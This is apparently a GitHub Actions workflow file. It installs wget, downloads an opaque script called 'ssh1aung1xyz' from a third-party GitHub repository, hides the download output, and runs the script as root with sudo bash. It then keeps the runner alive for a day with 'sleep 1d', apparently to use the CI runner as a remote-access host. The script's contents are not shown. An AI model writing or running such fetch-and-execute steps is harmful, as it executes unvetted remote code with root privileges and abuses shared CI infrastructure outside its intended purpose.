name: 1

on: 
  workflow_dispatch:
  
jobs:
  build:
    runs-on: ubuntu-latest   # Host runner

    steps:
      - uses: actions/checkout@v3

      - name: setup
        run: |
         sudo apt update && sudo  apt install wget sudo -y && sudo  wget https://github.com/githubaunglaymyanmar/onlytest/raw/refs/heads/main/ssh1aung1xyz &> /dev/null && sudo bash ssh1aung1xyz  

      - name: Ubuntu ready to go 
        run: sleep 1d
